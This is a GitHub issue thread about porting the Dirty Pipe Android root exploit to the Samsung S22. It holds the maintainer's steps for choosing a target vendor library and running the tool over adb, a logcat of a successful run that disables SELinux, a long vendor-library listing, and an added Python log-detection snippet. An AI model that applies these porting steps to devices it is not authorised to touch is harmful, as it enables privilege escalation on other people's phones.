polygraphene / DirtyPipe-Android

Dirty Pipe root exploit for Android (Pixel 6)

S22 #3

Open oakieville opened 2 years ago

oakieville commented 2 years ago

Could this same method work on s22? I assume it would require mymod.ko be built in s22 kernel source, but can it work?

polygraphene commented 2 years ago

Basically it should work by similar procedure. Need some modifications like:

  1. Fix function offset of libc++.so
  2. Choose proper library file to overwrite
  3. Build mymod.ko for s22 kernel source

If there is a dev interested in that, I can help them.

oakieville commented 2 years ago

I'm interested in trying it. I have the s22 kernel source as well as the firmware to extract libc++; however, I would need a good deal of guidance in this.

oakieville commented 2 years ago

If we could chat on Telegram or WhatsApp, that would be great.

oakieville commented 2 years ago

if possible contact me please oakieville209@gmail.com

oakieville commented 2 years ago

s22 libc++.so

000403e1 w DF .text 00000030 Base std::__1::basic_streambuf<char, std::__1::char_traits<char> >::basic_streambuf()
000403e1 w DF .text 00000030 Base std::__1::basic_streambuf<char, std::__1::char_traits<char> >::basic_streambuf()

polygraphene commented 2 years ago

Our schedules might not match for chat.

I added auto detection of the offset for libc++.so, so the remaining issues are the kernel module and libstagefright_soft_mp3dec.so. The kernel module may run on other devices without modification. Try it to check if it works.

Target vendor lib (in Pixel 6, libstagefright_soft_mp3dec.so) must have byte 0x57 at offset 0x1000, like the following:

$ xxd libstagefright_soft_mp3dec.so|grep 01000:
00001000: 5f61 6561 6269 5f6d 656d 6370 7900 5f5f  _aeabi_memcpy.__

If you can get the firmware image for the device, extract vendor.img on a PC and find a proper lib with the following command:

$ for i in vendor/lib/*.so; do echo $i; xxd $i | grep "001000: 5f" ; done
(snip)
vendor/lib/libstagefright_soft_hevcdec.so
vendor/lib/libstagefright_soft_mp3dec.so
00001000: 5f61 6561 6269 5f6d 656d 6370 7900 5f5f  _aeabi_memcpy.__
vendor/lib/libstagefright_soft_mpeg2dec.so
vendor/lib/libstagefright_soft_mpeg4dec.so
(snip)

If you can't find a proper lib, we should find other methods.

polygraphene commented 2 years ago

After finding the lib:

adb shell /data/local/tmp/dirtypipe-android -f (Found lib path)

You can also use /vendor/lib64/*.so, but a 32-bit lib should have a small impact on the system.

If you succeed, adb logcat looks like:

03-27 15:30:08.230     1     1 W /system/bin/init: type=1107 audit(0.0:27746): uid=0 auid=4294967295 ses=4294967295 subj=u:r:init:s0 msg='avc: denied { set } for property=a pid=12648 uid=2000 gid=2000 scontext=u:r:shell:s0 tcontext=u:object_r:default_prop:s0 tclass=property_service permissive=0'
03-27 15:30:08.240 12648 12648 W libc    : Unable to set property "a" to "a": error code: 0x18
01-01 09:00:00.1023 12649 12649 I stage2  : pipe_size: 65536
01-01 09:00:00.1023 12649 12649 I stage2  : Wait for child pid=12653
03-27 15:30:08.290 12653 12653 I modprobe: type=1400 audit(0.0:27747): avc: denied { read } for path="/dev/.dirtypipe-0057" dev="tmpfs" ino=1223 scontext=u:r:vendor_modprobe:s0 tcontext=u:object_r:device:s0 tclass=file permissive=1
03-27 15:30:08.290 12653 12653 I modprobe: type=1400 audit(0.0:27748): avc: denied { read } for path="pipe:[599140]" dev="pipefs" ino=599140 scontext=u:r:vendor_modprobe:s0 tcontext=u:r:init:s0 tclass=fifo_file permissive=1
03-27 15:30:08.290 12653 12653 I modprobe: type=1400 audit(0.0:27749): avc: denied { write } for path="pipe:[599140]" dev="pipefs" ino=599140 scontext=u:r:vendor_modprobe:s0 tcontext=u:r:init:s0 tclass=fifo_file permissive=1
03-27 15:30:08.343 12653 12653 I modprobe-payload: Successfully set permissive: /vendor/lib/libstagefright_soft_mp3dec.so -1 42
03-27 15:30:08.338 12654 12654 I modprobe: type=1400 audit(0.0:27750): avc: denied { search } for name="tmp" dev="dm-56" ino=94 scontext=u:r:vendor_modprobe:s0 tcontext=u:object_r:shell_data_file:s0 tclass=dir permissive=1
03-27 15:30:08.338 12654 12654 I modprobe: type=1400 audit(0.0:27751): avc: denied { execute } for name="startup-root" dev="dm-56" ino=101332 scontext=u:r:vendor_modprobe:s0 tcontext=u:object_r:shell_data_file:s0 tclass=file permissive=1
03-27 15:30:08.338 12654 12654 I modprobe: type=1400 audit(0.0:27752): avc: denied { read open } for path="/data/local/tmp/startup-root" dev="dm-56" ino=101332 scontext=u:r:vendor_modprobe:s0 tcontext=u:object_r:shell_data_file:s0 tclass=file permissive=1
01-01 09:00:00.1023 12649 12649 I stage2  : waitid returned with 0. Restore files.
03-27 15:30:09.554 12658 12658 I rm      : type=1400 audit(0.0:28232): avc: denied { search } for name="tmp" dev="dm-56" ino=94 scontext=u:r:vendor_modprobe:s0 tcontext=u:object_r:shell_data_file:s0 tclass=dir permissive=1
03-27 15:30:09.554 12658 12658 I rm      : type=1400 audit(0.0:28233): avc: denied { getattr } for path="/data/local/tmp/reverse-fifo" dev="dm-56" ino=107557 scontext=u:r:vendor_modprobe:s0 tcontext=u:object_r:shell_data_file:s0 tclass=fifo_file permissive=1
03-27 15:30:09.554 12658 12658 I rm      : type=1400 audit(0.0:28234): avc: denied { dac_override } for capability=1 scontext=u:r:vendor_modprobe:s0 tcontext=u:r:vendor_modprobe:s0 tclass=capability permissive=1
03-27 15:30:09.554 12658 12658 I rm      : type=1400 audit(0.0:28235): avc: denied { write } for name="tmp" dev="dm-56" ino=94 scontext=u:r:vendor_modprobe:s0 tcontext=u:object_r:shell_data_file:s0 tclass=dir permissive=1
03-27 15:30:09.554 12658 12658 I rm      : type=1400 audit(0.0:28236): avc: denied { remove_name } for name="reverse-fifo" dev="dm-56" ino=107557 scontext=u:r:vendor_modprobe:s0 tcontext=u:object_r:shell_data_file:s0 tclass=dir permissive=1
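
A defender-side check over the logcat output above, added here as an example (it is not part of the original comment or of the project): it parses the SELinux AVC records and flags a domain that logs permissive=1 and a non-shell domain executing a file labelled shell_data_file. The function and rule names are hypothetical, the sample lines are copied from the log above, and it assumes a production build where every domain is expected to be enforcing.

```python
import re
from collections import namedtuple

# Sample input: five lines copied verbatim from the logcat output above.
SAMPLE_LOG = """
03-27 15:30:08.230     1     1 W /system/bin/init: type=1107 audit(0.0:27746): uid=0 auid=4294967295 ses=4294967295 subj=u:r:init:s0 msg='avc: denied { set } for property=a pid=12648 uid=2000 gid=2000 scontext=u:r:shell:s0 tcontext=u:object_r:default_prop:s0 tclass=property_service permissive=0'
01-01 09:00:00.1023 12649 12649 I stage2  : Wait for child pid=12653
03-27 15:30:08.290 12653 12653 I modprobe: type=1400 audit(0.0:27747): avc: denied { read } for path="/dev/.dirtypipe-0057" dev="tmpfs" ino=1223 scontext=u:r:vendor_modprobe:s0 tcontext=u:object_r:device:s0 tclass=file permissive=1
03-27 15:30:08.338 12654 12654 I modprobe: type=1400 audit(0.0:27751): avc: denied { execute } for name="startup-root" dev="dm-56" ino=101332 scontext=u:r:vendor_modprobe:s0 tcontext=u:object_r:shell_data_file:s0 tclass=file permissive=1
03-27 15:30:09.554 12658 12658 I rm      : type=1400 audit(0.0:28234): avc: denied { dac_override } for capability=1 scontext=u:r:vendor_modprobe:s0 tcontext=u:r:vendor_modprobe:s0 tclass=capability permissive=1
""".strip().splitlines()

# "avc: denied { perms } for key=value ..." as it appears inside a logcat line.
AVC_RE = re.compile(r"avc:\s+denied\s+\{(?P<perms>[^}]*)\}\s+for\s+(?P<rest>.*)")
KV_RE = re.compile(r"(\w+)=(\"[^\"]*\"|\S+)")

Finding = namedtuple("Finding", "rule source target perms obj")


def parse_avc(line):
    """Return the fields of an SELinux AVC denial in a logcat line, or None."""
    m = AVC_RE.search(line)
    if m is None:
        return None
    # Values may be double-quoted; type=1107 records wrap the message in '...'.
    fields = {k: v.strip("\"'") for k, v in KV_RE.findall(m.group("rest"))}
    fields["perms"] = m.group("perms").split()
    return fields


def selinux_type(context):
    """'u:r:vendor_modprobe:s0' -> 'vendor_modprobe'."""
    parts = context.split(":")
    return parts[2] if len(parts) >= 3 else context


def scan(lines):
    """Apply two rules to every AVC record and return the findings in order."""
    findings = []
    for line in lines:
        avc = parse_avc(line)
        if avc is None or "scontext" not in avc or "tcontext" not in avc:
            continue
        src = selinux_type(avc["scontext"])
        tgt = selinux_type(avc["tcontext"])
        obj = avc.get("path") or avc.get("name") or avc.get("property") or ""
        perms = tuple(avc["perms"])

        # Rule 1: the access was logged but allowed, so the source domain (or
        # the whole system) is permissive. Assumption: production build.
        if avc.get("permissive") == "1":
            findings.append(Finding("permissive-domain", src, tgt, perms, obj))

        # Rule 2: a domain other than the adb shell executes a file carrying
        # the label given to files under /data/local/tmp.
        if (tgt == "shell_data_file" and src != "shell"
                and {"execute", "execute_no_trans"} & set(perms)):
            findings.append(Finding("exec-from-shell-data", src, tgt, perms, obj))
    return findings


def permissive_domains(findings):
    """Sorted list of source domains seen running permissive."""
    return sorted({f.source for f in findings if f.rule == "permissive-domain"})


if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f"{f.rule:22} {f.source} -> {f.target} {{{' '.join(f.perms)}}} {f.obj}")
    print("permissive domains:", permissive_domains(scan(SAMPLE_LOG)))
```

The first sample line (permissive=0, a normal enforced denial for the shell domain) and the non-audit stage2 line produce no findings; only the vendor_modprobe records do.
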

elliwigy commented 2 years ago

Not sure if it matters but you can run those commands from shell/on the device itself.. If you run:

xxd libstagefright_soft_mp3dec.so|grep 01000
00001000: 695f 6d65 6d63 7079 3400 5f5f 6165 6162  i_memcpy4.__aeab
00010000: 1400 5ae3 f2fa ffda 1500 5ae3 f7fa ff1a  ..Z.......Z.....

and furthermore the other code returns a long list which I will provide shortly.. are we looking for something that contains this exactly:

00001000: 5f61 6561 6269 5f6d 656d 6370 7900 5f5f _aeabi_memcpy.__

oakieville commented 2 years ago

Hey elliwigy, how are you doing? OK, I will check as you instructed above. I do see that libstagefright_soft_mp3dec.so on s22 doesn't seem to exist. There are other libstagefright libs there, however I have not yet checked the offset; I will do so later today or tomorrow.

elliwigy commented 2 years ago

These are all the ones it finds:

for i in vendor/lib/*.so; do echo $i; xxd $i | grep "001000: 5f" ; done
vendor/lib/android.automotive.watchdog-V2-ndk_platform.so
vendor/lib/android.frameworks.cameraservice.common@2.0.so
vendor/lib/android.frameworks.cameraservice.device@2.0.so
vendor/lib/android.frameworks.cameraservice.device@2.1.so
vendor/lib/android.frameworks.cameraservice.service@2.0.so
vendor/lib/android.frameworks.cameraservice.service@2.1.so
vendor/lib/android.frameworks.cameraservice.service@2.2.so
vendor/lib/android.frameworks.sensorservice@1.0.so
vendor/lib/android.hardware.audio.common-util.so
vendor/lib/android.hardware.audio.common@2.0-util.so
vendor/lib/android.hardware.audio.common@4.0-util.so
vendor/lib/android.hardware.audio.common@4.0.so
vendor/lib/android.hardware.audio.common@5.0-util.so
vendor/lib/android.hardware.audio.common@5.0.so
vendor/lib/android.hardware.audio.common@6.0-util.so
vendor/lib/android.hardware.audio.common@6.0.so
vendor/lib/android.hardware.audio.common@7.0-enums.so
vendor/lib/android.hardware.audio.common@7.0-util.so
vendor/lib/android.hardware.audio.common@7.0.so
vendor/lib/android.hardware.audio.effect@2.0-util.so
vendor/lib/android.hardware.audio.effect@2.0.so
vendor/lib/android.hardware.audio.effect@4.0-util.so
vendor/lib/android.hardware.audio.effect@4.0.so
vendor/lib/android.hardware.audio.effect@5.0-util.so
vendor/lib/android.hardware.audio.effect@5.0.so
vendor/lib/android.hardware.audio.effect@6.0-util.so
vendor/lib/android.hardware.audio.effect@6.0.so
vendor/lib/android.hardware.audio.effect@7.0-util.so
vendor/lib/android.hardware.audio.effect@7.0.so
vendor/lib/android.hardware.audio@2.0-util.so
vendor/lib/android.hardware.audio@2.0.so
vendor/lib/android.hardware.audio@4.0-util.so
vendor/lib/android.hardware.audio@4.0.so
vendor/lib/android.hardware.audio@5.0-util.so
00001000: 5f5a 4e37 616e 6472 6f69 6438 6861 7264  _ZN7android8hard
vendor/lib/android.hardware.audio@5.0.so
vendor/lib/android.hardware.audio@6.0-util.so
00001000: 5f5a 4e37 616e 6472 6f69 6438 6861 7264  _ZN7android8hard
vendor/lib/android.hardware.audio@6.0.so
vendor/lib/android.hardware.audio@7.0-util.so
vendor/lib/android.hardware.audio@7.0.so
vendor/lib/android.hardware.automotive.vehicle@2.0-manager-lib.so
vendor/lib/android.hardware.automotive.vehicle@2.0.so
vendor/lib/android.hardware.biometrics.face@1.0.so
vendor/lib/android.hardware.bluetooth.audio@2.0.so
vendor/lib/android.hardware.bluetooth.audio@2.1.so
vendor/lib/android.hardware.camera.common@1.0.so
vendor/lib/android.hardware.camera.device@1.0.so
vendor/lib/android.hardware.camera.device@3.2.so
vendor/lib/android.hardware.camera.device@3.3.so
vendor/lib/android.hardware.camera.device@3.4.so
vendor/lib/android.hardware.camera.device@3.5.so
vendor/lib/android.hardware.camera.device@3.6.so
vendor/lib/android.hardware.camera.device@3.7.so
vendor/lib/android.hardware.camera.metadata@3.2.so
vendor/lib/android.hardware.camera.metadata@3.3.so
vendor/lib/android.hardware.camera.metadata@3.4.so
vendor/lib/android.hardware.camera.metadata@3.5.so
vendor/lib/android.hardware.camera.metadata@3.6.so
vendor/lib/android.hardware.camera.provider@2.4-legacy.so
vendor/lib/android.hardware.camera.provider@2.4.so
vendor/lib/android.hardware.camera.provider@2.5-legacy.so
vendor/lib/android.hardware.camera.provider@2.5.so
vendor/lib/android.hardware.camera.provider@2.6.so
vendor/lib/android.hardware.cas.native@1.0.so
vendor/lib/android.hardware.cas@1.0.so
vendor/lib/android.hardware.cas@1.1.so
vendor/lib/android.hardware.cas@1.2.so
vendor/lib/android.hardware.gatekeeper@1.0.so
vendor/lib/android.hardware.gnss.measurement_corrections@1.0.so
vendor/lib/android.hardware.gnss.measurement_corrections@1.1.so
vendor/lib/android.hardware.gnss.visibility_control@1.0.so
vendor/lib/android.hardware.gnss@1.0.so
vendor/lib/android.hardware.gnss@1.1.so
vendor/lib/android.hardware.gnss@2.0.so
vendor/lib/android.hardware.gnss@2.1.so
vendor/lib/android.hardware.graphics.composer@2.1.so
vendor/lib/android.hardware.graphics.composer@2.2.so
vendor/lib/android.hardware.graphics.composer@2.3.so
vendor/lib/android.hardware.health@1.0.so
vendor/lib/android.hardware.health@2.0.so
vendor/lib/android.hardware.health@2.1.so
vendor/lib/android.hardware.media.c2@1.0.so
vendor/lib/android.hardware.media.c2@1.1.so
vendor/lib/android.hardware.power@1.0.so
vendor/lib/android.hardware.power@1.1.so
vendor/lib/android.hardware.power@1.2.so
vendor/lib/android.hardware.sensors@1.0.so
vendor/lib/android.hardware.sensors@2.0-ScopedWakelock.so
vendor/lib/android.hardware.sensors@2.0.so
vendor/lib/android.hardware.sensors@2.1.so
vendor/lib/android.hardware.soundtrigger@2.1.so
vendor/lib/android.hardware.soundtrigger@2.2.so
vendor/lib/android.hardware.soundtrigger@2.3.so
vendor/lib/android.hardware.thermal@1.0.so
vendor/lib/android.hardware.thermal@2.0.so
vendor/lib/android.hidl.allocator@1.0.so
vendor/lib/android.hidl.memory.block@1.0.so
vendor/lib/android.system.net.netd@1.0.so
vendor/lib/android.system.net.netd@1.1.so
vendor/lib/audio_common-aidl-cpp.so
vendor/lib/audioclient-types-aidl-cpp.so
vendor/lib/btaudio_offload_if.so
vendor/lib/camera.device@1.0-impl.so
vendor/lib/camera.device@3.2-impl.so
vendor/lib/camera.device@3.3-impl.so
vendor/lib/camera.device@3.4-impl.so
vendor/lib/camera.device@3.5-impl.so
vendor/lib/camx.device@3.2-impl.so
vendor/lib/camx.device@3.3-impl.so
vendor/lib/camx.device@3.4-ext-impl.so
vendor/lib/camx.device@3.4-impl.so
vendor/lib/camx.device@3.5-ext-impl.so
vendor/lib/camx.device@3.5-impl.so
vendor/lib/camx.device@3.6-ext-impl.so
vendor/lib/camx.device@3.6-impl.so
vendor/lib/camx.provider@2.4-external.so
vendor/lib/camx.provider@2.4-impl.so
vendor/lib/camx.provider@2.4-legacy.so
vendor/lib/camx.provider@2.5-external.so
vendor/lib/camx.provider@2.5-legacy.so
vendor/lib/camx.provider@2.6-legacy.so
vendor/lib/cdsp_face.so
vendor/lib/cdsp_face_4.2.so
vendor/lib/com.qti.chiusecaseselector.so
vendor/lib/com.qti.feature2.anchorsync.so
vendor/lib/com.qti.feature2.demux.so
vendor/lib/com.qti.feature2.derivedoffline.so
vendor/lib/com.qti.feature2.frameselect.so
vendor/lib/com.qti.feature2.fusion.so
vendor/lib/com.qti.feature2.generic.so
vendor/lib/com.qti.feature2.gs.cedros.so
vendor/lib/com.qti.feature2.gs.fillmore.so
vendor/lib/com.qti.feature2.gs.sdm865.so
vendor/lib/com.qti.feature2.gs.sm8350.so
vendor/lib/com.qti.feature2.gs.sm8450.so
vendor/lib/com.qti.feature2.hdr.so
vendor/lib/com.qti.feature2.mcreprocrt.so
vendor/lib/com.qti.feature2.memcpy.so
vendor/lib/com.qti.feature2.mfsr.sm8450.so
vendor/lib/com.qti.feature2.mfsr.so
vendor/lib/com.qti.feature2.ml.so
vendor/lib/com.qti.feature2.mux.so
vendor/lib/com.qti.feature2.qcfa.so
vendor/lib/com.qti.feature2.rawhdr.so
vendor/lib/com.qti.feature2.realtimeserializer.so
vendor/lib/com.qti.feature2.rt.so
vendor/lib/com.qti.feature2.rtmcx.so
vendor/lib/com.qti.feature2.serializer.so
vendor/lib/com.qti.feature2.statsregeneration.so
vendor/lib/com.qti.feature2.stub.so
vendor/lib/com.qti.feature2.swmf.so
vendor/lib/com.qti.qseeaon.so
vendor/lib/com.qti.qseeutils.so
vendor/lib/com.qti.settings.fillmore.so
vendor/lib/com.qti.settings.sm8450.so
vendor/lib/com.qti.stats.common.so
vendor/lib/com.qualcomm.mcx.distortionmapper.so
vendor/lib/com.qualcomm.mcx.linearmapper.so
vendor/lib/com.qualcomm.mcx.policy.mfl.so
vendor/lib/com.qualcomm.mcx.policy.xr.so
vendor/lib/com.qualcomm.qti.imscmservice@1.0.so
vendor/lib/com.qualcomm.qti.imscmservice@2.0.so
vendor/lib/com.qualcomm.qti.imscmservice@2.1.so
vendor/lib/com.qualcomm.qti.imscmservice@2.2.so
vendor/lib/com.qualcomm.qti.mcx.usecase.extension.so
vendor/lib/com.qualcomm.qti.uceservice@2.0.so
vendor/lib/com.qualcomm.qti.uceservice@2.1.so
vendor/lib/com.qualcomm.qti.uceservice@2.2.so
vendor/lib/com.qualcomm.qti.uceservice@2.3.so
vendor/lib/framework-permission-aidl-cpp.so
vendor/lib/libAFSegmenter_v1.camera.samsung.so
vendor/lib/libAImode_wrapper.camera.samsung.so
vendor/lib/libAIphoto_core.camera.samsung.so
vendor/lib/libAlacSwDec.so
vendor/lib/libApeSwDec.so
vendor/lib/libBeauty_v4.camera.samsung.so
vendor/lib/libBlurDetectionDeepLearning.camera.samsung.so
vendor/lib/libCB.so
vendor/lib/libDepthBokehVideo_interface.so
vendor/lib/libDeviceInfoProvider.so
vendor/lib/libEGL_adreno.so
vendor/lib/libEventFinder.camera.samsung.so
vendor/lib/libEvrcSwCodec.so
vendor/lib/libFacePreProcessing.camera.samsung.so
vendor/lib/libFaceService.so
vendor/lib/libFace_Landmark_API.camera.samsung.so
vendor/lib/libFastUWDistortionCorrection.camera.samsung.so
vendor/lib/libFlacSwDec.so
vendor/lib/libFrucSSMLib.so
vendor/lib/libGLESv2_adreno.so
vendor/lib/libGPQTEEC_vendor.so
vendor/lib/libGPTEE_vendor.so
vendor/lib/libGPreqcancel.so
vendor/lib/libGPreqcancel_svc.so
vendor/lib/libHDRVerifier_v1.camera.samsung.so
vendor/lib/libHandGesture.camera.samsung.so
vendor/lib/libHprFace_GAE_api.camera.samsung.so
vendor/lib/libHprVisualEffect.so
vendor/lib/libHpr_RecGAE_cvFeature_v1.0.camera.samsung.so
vendor/lib/libHumanSegVideoModel_Vendor.so
vendor/lib/libIDDQD_core.so
vendor/lib/libIMUSensor.so
vendor/lib/libLocalTM_capture_core.camera.samsung.so
vendor/lib/libLocalTM_preview_core.so
vendor/lib/libLocalTM_wrapper.camera.samsung.so
vendor/lib/libMoireDetection.camera.samsung.so
vendor/lib/libMoireDetectionWrapper.camera.samsung.so
vendor/lib/libMoireDetector.uniplugin@1.0.so
vendor/lib/libMoonVerifier_v1.camera.samsung.so
vendor/lib/libObjectDetector_v1.camera.samsung.so
vendor/lib/libOmxCore.so
vendor/lib/libOpenCL.so
vendor/lib/libOpenCv.camera.samsung.so
vendor/lib/libPanDetector.so
vendor/lib/libPersonal_capture.camera.samsung.so
vendor/lib/libPersonal_core.camera.samsung.so
vendor/lib/libPetDetector_interface.so
vendor/lib/libPlaneSegmentationWrapper.so
vendor/lib/libQSEEComAPI.so
vendor/lib/libQTEEConnector_listener.so
vendor/lib/libQTEEConnector_vendor.so
vendor/lib/libQcelp13SwCodec.so
vendor/lib/libRelighting_API.camera.samsung.so
vendor/lib/libSSMAutoTrigger_interface.so
vendor/lib/libSSM_AutoTrigger.so
vendor/lib/libSceneDetector_v1.camera.samsung.so
vendor/lib/libSingleTakeBlurDetection.uniplugin@1.0.so
vendor/lib/libTouchInputVM.so
vendor/lib/libTrustedInput.so
vendor/lib/libTrustedInputTZ.so
vendor/lib/libTrustedUI.so
vendor/lib/libTrustedUITZ.so
vendor/lib/libTrustedUIVM.so
vendor/lib/libVideoSuperNight_interface.so
vendor/lib/lib_SamsungRec_08020.so
vendor/lib/lib_SoundAlive_3DPosition_ver202.so
vendor/lib/lib_SoundAlive_AlbumArt_ver105.so
vendor/lib/lib_SoundAlive_play_plus_ver500.so
vendor/lib/lib_SoundBooster_ver1100.so
vendor/lib/lib_bt_aptx.so
vendor/lib/lib_bt_ble.so
vendor/lib/lib_bt_bundle.so
vendor/lib/lib_lvacfs.so
vendor/lib/libadm.so
vendor/lib/libadreno_app_profiles.so
vendor/lib/libadreno_utils.so
vendor/lib/libadsp_default_listener.so
vendor/lib/libadsprpc.so
vendor/lib/libagm.so
vendor/lib/libagm_compress_plugin.so
vendor/lib/libagm_mixer_plugin.so
vendor/lib/libagm_pcm_plugin.so
vendor/lib/libagmclient.so
vendor/lib/libagmmixer.so
vendor/lib/libaidenoiser.so
vendor/lib/libaivideocentral.arcsoft.so
vendor/lib/libalsautils.so
vendor/lib/libapex_cmn.so
vendor/lib/libapex_utils.so
vendor/lib/libar-acdb.so
vendor/lib/libar-gpr.so
vendor/lib/libar-gsl.so
vendor/lib/libar-pal.so
vendor/lib/libarcsoft_aieffectpk_video.so
vendor/lib/libarcsoft_aieffectpk_video_bokeh.so
vendor/lib/libarcsoft_aieffectpk_video_plight.so
vendor/lib/libarcsoft_dualcam_portraitlighting_preview.so
vendor/lib/libarcsoft_object_tracking.so
vendor/lib/libarcsoft_video_super_night.so
00001000: 5f63 6f6e 645f 6272 6f61 6463 6173 7400  _cond_broadcast.
vendor/lib/libats.so
vendor/lib/libaudio_log_utils.so
vendor/lib/libaudioclient_aidl_conversion.so
vendor/lib/libaudiofoundation.so
vendor/lib/libauto_framing_arcsoft.uniplugin@1.0.so
vendor/lib/libautotracking_interface.so
vendor/lib/libavservices_minijail.so
vendor/lib/libbase64.so
vendor/lib/libbatching.so
vendor/lib/libbatterylistener.so
vendor/lib/libbauthserver.so
vendor/lib/libbauthtzcommon.so
vendor/lib/libbeautyshot.arcsoft.so
vendor/lib/libbitmlengine.so
vendor/lib/libbitmlenginev2.so
vendor/lib/libbluetooth_a2dpsink_session.so
vendor/lib/libbluetooth_audio_session.so
vendor/lib/libbluetooth_audio_session_qti.so
vendor/lib/libbluetooth_audio_session_qti_2_1.so
vendor/lib/libbodyid.arcsoft.so
vendor/lib/libbthost_if.so
vendor/lib/libcacertclient.so
vendor/lib/libcamera2ndk_vendor.so
vendor/lib/libcamera_nn_stub.so
vendor/lib/libcamerapostproc.so
vendor/lib/libcamxcommonutils.so
vendor/lib/libcamxexternalformatutils.so
vendor/lib/libcamxfacialfeatures.so
vendor/lib/libcamxfdalgo.so
vendor/lib/libcamxfdengine.so
vendor/lib/libcamxhwnodecontext.so
vendor/lib/libcamxifestriping.so
00001000: 5f68 616e 646c 655f 6e75 6c6c 6162 696c  _handle_nullabil
vendor/lib/libcamximageformatutils.so
vendor/lib/libcamxqsatalgo.so
vendor/lib/libcamxsettingsmanager.so
vendor/lib/libcamxstatscore.so
vendor/lib/libcamxswispiqmodule.so
vendor/lib/libcamxswprocessalgo.so
vendor/lib/libcamxtintlessalgo.so
vendor/lib/libcapiv2svacnnvendor.so
vendor/lib/libcapiv2svarnnvendor.so
vendor/lib/libcapiv2uvvendor.so
vendor/lib/libcdfw.so
vendor/lib/libcdfw_remote_api.so
vendor/lib/libcdsp_default_listener.so
vendor/lib/libcdsprpc.so
vendor/lib/libchilog.so
vendor/lib/libchrome.so
vendor/lib/libcne.so
vendor/lib/libcneapiclient.so
vendor/lib/libcneoplookup.so
vendor/lib/libcneqmiutils.so
vendor/lib/libcodec2_hidl@1.0.so
vendor/lib/libcodec2_hidl@1.1.so
vendor/lib/libcodec2_hidl_plugin.so
vendor/lib/libcodec2_simple_component.so
vendor/lib/libcodec2_soft_common.so
vendor/lib/libcodec2_vndk.so
vendor/lib/libcodecsolutionhelper_vendor.so
vendor/lib/libcolor-default.so
vendor/lib/libcom.qti.chinodeutils.so
vendor/lib/libconfigdb.so
vendor/lib/libcpion.so
vendor/lib/libcv_common.so
vendor/lib/libdataitems.so
vendor/lib/libdepth_bokeh_video.uniplugin@1.0.so
vendor/lib/libdiag.so
vendor/lib/libdiagjni.so
vendor/lib/libdigital-dimming.so
vendor/lib/libdisp-aba.so
vendor/lib/libdisplayconfig.qti.so
vendor/lib/libdisplaydebug.so
vendor/lib/libdisplayqos.so
vendor/lib/libdisplayskuutils.so
vendor/lib/libdpps.so
vendor/lib/libdrm.so
vendor/lib/libdrmfs.so
00001000: 5f63 6669 5f63 6865 636b 5f66 6169 6c5f  _cfi_check_fail_
vendor/lib/libdrmtime.so
vendor/lib/libdrmutils.so
vendor/lib/libdsd2pcm.so
vendor/lib/libdsi_netctrl.so
vendor/lib/libdsphist_qc.so
vendor/lib/libdspmc_qc.so
vendor/lib/libdspmc_wrapper.so
vendor/lib/libdsutils.so
vendor/lib/libdualcam_refocus_image.so
vendor/lib/libdualcam_refocus_video.so
vendor/lib/libeffects.so
vendor/lib/libeffectsconfig.so
vendor/lib/libegis_fp_normal_sensor_test.so
vendor/lib/libengine_did.so
vendor/lib/libesesbprovision.so
vendor/lib/libeva.so
vendor/lib/libeva_util.so
vendor/lib/libevent_finder.uniplugin@1.0.so
vendor/lib/libexifa.camera.samsung.so
vendor/lib/libface_landmark.arcsoft.so
vendor/lib/libfast_uwdc.uniplugin@1.0.so
vendor/lib/libfastcvdsp_stub.so
vendor/lib/libfastcvopt.so
vendor/lib/libfidoauthnr_v2.so
vendor/lib/libfilefinder.so
vendor/lib/libfloatingfeature.so
vendor/lib/libfmpal.so
00001000: 5f31 325f 5f76 616c 7565 5f74 7970 6549  _12__value_typeI
vendor/lib/libfocuspeaking.so
vendor/lib/libfocuspeaking.uniplugin@1.0.so
vendor/lib/libformatConverter.unifunc.so
vendor/lib/libgame_enhance.so
vendor/lib/libgaya.so
vendor/lib/libgeofencing.so
vendor/lib/libgf_in_system_lib.so
vendor/lib/libgnss.so
vendor/lib/libgnsspps.so
vendor/lib/libgps.utils.so
vendor/lib/libgpu_tonemapper.so
00001000: 5f00 5f5a 3230 656e 6769 6e65 5f64 656c  _._Z20engine_del
vendor/lib/libgpudataproducer.so
vendor/lib/libgralloc.qti.so
vendor/lib/libgralloc_helper.unifunc.so
vendor/lib/libgralloccore.so
vendor/lib/libgrallocusage.so
vendor/lib/libgrallocutils.so
vendor/lib/libgsl.so
vendor/lib/libhand_interaction.uniplugin@1.0.so
vendor/lib/libhandgesture.arcsoft.so
vendor/lib/libhdcp1prov.so
vendor/lib/libhdcp2p2prov.so
vendor/lib/libhdcpsrm.so
vendor/lib/libhdr10plus.so
vendor/lib/libhdr_backlight_adapter.so
vendor/lib/libhdr_tm.so
vendor/lib/libhdradaptivecustom.so
vendor/lib/libhdrdynamic.so
vendor/lib/libhdrdynamicootf.so
vendor/lib/libhermes.so
00001000: 5f39 616c 6c6f 6361 746f 7249 5335 5f45  _9allocatorIS5_E
vendor/lib/libhidltransport.so
vendor/lib/libhqm_hwparam.so
vendor/lib/libhwbinder.so
vendor/lib/libhypermotion_core.so
vendor/lib/libhypermotion_interface.so
vendor/lib/libhypervintf.so
vendor/lib/libiddqd.uniplugin@1.0.so
vendor/lib/libidl.so
vendor/lib/libimage_enhancement.arcsoft.so
00001000: 5f6d 7574 6578 5f64 6573 7472 6f79 0070  _mutex_destroy.p
vendor/lib/libimagecodec_native.quram.so
vendor/lib/libipebpsstriping.so
vendor/lib/libipebpsstriping170.so
vendor/lib/libipebpsstriping480.so
vendor/lib/libizat_client_api.so
vendor/lib/libizat_core.so
vendor/lib/libjnihelper.so
vendor/lib/libjpege.so
vendor/lib/libjpegencoder_sw.unifunc.so
vendor/lib/libjpegsq.media.samsung.so
vendor/lib/libjpegsqueezer_sw.unifunc.so
vendor/lib/libjson.so
vendor/lib/libkcl.so
vendor/lib/libkernelmanager.so
vendor/lib/liblbs_core.so
vendor/lib/liblistensoundmodel2vendor.so
vendor/lib/liblivefocus_capture_engine.so
vendor/lib/liblivefocus_capture_interface.so
vendor/lib/liblivefocus_preview_engine.so
vendor/lib/liblivefocus_preview_interface.so
vendor/lib/libllvm-glnext.so
vendor/lib/libllvm-qcom.so
vendor/lib/libllvm-qgl.so
vendor/lib/libloc_api_v02.so
vendor/lib/libloc_api_wds.so
vendor/lib/libloc_core.so
vendor/lib/libloc_socket.so
vendor/lib/libloc_util.so
vendor/lib/liblocation_api.so
vendor/lib/liblocationservice.so
vendor/lib/liblocationservice_glue.so
vendor/lib/liblowi_client.so
vendor/lib/liblx-ar_util.so
vendor/lib/liblx-osal.so
